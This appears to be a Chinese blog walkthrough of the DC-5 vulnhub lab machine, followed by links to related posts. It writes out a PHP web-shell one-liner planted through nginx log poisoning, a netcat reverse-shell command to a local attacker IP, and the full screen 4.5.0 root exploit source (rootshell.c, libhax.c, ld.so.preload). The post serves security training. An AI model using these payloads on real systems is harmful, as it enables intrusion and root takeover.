DC-5靶机

已于 2022-07-02 17:46:11 修改
阅读量361 收藏
点赞数 1
分类专栏: DC靶机 文章标签: 服务器 网络 linux
于 2022-07-01 19:07:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/125545079
版权

ifconfig

查找主机IP

扫一波内网,探测下存活主机

nmap 192.168.61.0/24

使用nmap工具对DC-5靶机扫描开放的端口

nmap -A -T4 192.168.61.133 -p- -oN nmap133.A

(中途IP改成了192.168.61.134)

开放了80,111,39542

打开显示的IP地址

 在concat界面把信息填写,就会跳转页面,是GET传参

 反复刷新会发现时间有变化,猜测页面存在文件包含(?)

然后用burp爆破页面(御剑扫不出来)

一共7个

 footer可以看到这个,确认这个是包含界面

使用BurpSuite爆破文件包含的变量名,及后台passwd文件存在位置

变量名:file,passwd文件位置:/etc/passwd

查看日志保存位置:

法一:

使用BurpSuite抓包爆破靶机日志文件的位置,爆破成功

/var/log/nginx/error.log
/var/log/nginx/access.log 

法二:

file==/etc/nginx/nginx.conf

<?php system($_GET['test']);?>

使用BurpSuite修改数据包数据,写入一句话木马,打开日志文件可以看到成功写入

使用一句话木马执行命令

/var/log/nginx/error.log&test=ls

 在kali进行监听

netcat -l -p 4444
file=/var/log/nginx/error.log&test=nc+192.168.61.129+4444+-e+/bin/bash

然后

python -c 'import pty;pty.spawn("/bin/sh")'

 查找权限

(130条消息) find / -perm -4000 2>/dev/null的拆分讲解_Marx_Otto的博客-CSDN博客 

find / -perm /4000 2>/dev/null

简单来说:寻找 4000权限的文件,不显示其他的错误信息相当于过滤。 

screen-4.5.0:命令行终端切换的软件,通过它同时连接几个本地或远程的命令行会话,可以作为一个提权的点

查看漏洞

把文件提取出来

cp /usr/share/exploitdb/exploits/linux/local/41154.sh screen_450.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.sh screen_450.txt

打开文件

cat screen_450.txt
cat screen_450.sh

根据提示把代码保存到/tmp下

分别保存为

rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

libhax.c 

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

然后把rootshell.c编译成rootshell

gcc -o /tmp/rootshell /tmp/rootshell.c

把libhax.c编译成libhax.so 

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

先是libhax.so

在虚拟机

nc -lvvp 4444 < libhax.so

在目标机

nc 192.168.61.129 4444 > libhax.so

 然后在主机上ctrl+c终止

然后是rootshell

在虚拟机

nc -lvvp 4444 < rootshell

在目标机

nc 192.168.61.129 4444 > rootshell

在目标机上查看,可以看到传入成功 

 然后进行一系列的提权步骤

(之前漏洞信息里有步骤)

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

screen -ls

/tmp/rootshell

然后就获得root权限了(whoami查看)

cd /root

ls

cat thisistheflag.txt

m0_62094846
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC靶机系列:DC-5
Ays.Ie的博客
02-27 352
本篇文章为DC系列第5个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 772
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-5靶机,致网络安全开发者
最新发布
2301_79058150的博客
04-03 811
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
vulnhub靶场,DC-5
kukudeshuo的博客
07-13 491
vulnhub靶场,DC-5 环境准备 攻击机:kali(192.168.58.130) 靶机DC-5(192.168.58.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.148 使用nmap扫描查看目标靶机端口开放情况 开放端口:80、111、55980 web容器:nginx 浏览器访问目标靶机80端口 就只是一些文字,没
【DC系列05】DC-5靶机复盘
weixin_44681307的博客
07-09 120
利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。发现有两个可以利用的漏洞文件。
vulnhub之DC5靶机
LainWith的博客
08-15 562
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
【VulnHub系列】DC-5靶机
薛定谔嘚喵博客
03-10 242
DC-5靶机
DC-5靶机渗透
m0_62008601的博客
05-21 623
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
Vulnhub-DC-5靶机实战
御七彩虹猫
05-18 857
Vulnhub-DC-5靶机实战
Vulnhub靶场实战———DC5
m0_67309561的博客
05-07 125
我们每次提交时,下面数字都会发现改变,我们猜测并不是一个静态数据,存在文件包含,我们测试一下。PS:此关和前面DC4一样,都是只有一个FLAG并且是通过提权的方式来获取FLAG。果然存在数据,但是这个站点不存在文件上传功能,所以尝试包含日志文件写shell。查看该用户有什么root权限命令,我们发现了一个screen的东西。已经存在了两个文件,接下来我们将其上传至靶机 tmp目录。我们发现了两个exp, 我们在kali本地编译得到。上传完成,接下来就到了最后的提取操作了。发现80端口开启,我们进入看一下。
【vulnhub】---DC-5靶机
qq_43168364的博客
08-21 389
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-5靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 收集到的相关信息: *
DC-5 的靶机渗透
m0_74950307的博客
10-24 51
当一个文件被设置了 SUID 权限时,它会以文件所有者的身份而不是执行者自己的身份来执行。它的含义是在整个文件系统中搜索所有具有 SUID(Set User ID)权限的文件,并将结果输出到标准输出。他是2020版本的,而且,在/footer.php的界面中是2017版本的,它发生了变化。造成了文件包含漏洞在thankyou.php可以调用其他文件的信息,那么就好办了。可以看到下载被终止了原因是已经存在该文件,所以这个方法是可行的。调用出来了他的信息,看来真的存在,但是并没有可以登录的用户。
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 6322
DC-5靶机渗透测试详细教程
DC:5靶机通关详解
arcuied
04-17 232
DC:5靶机通关详解
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值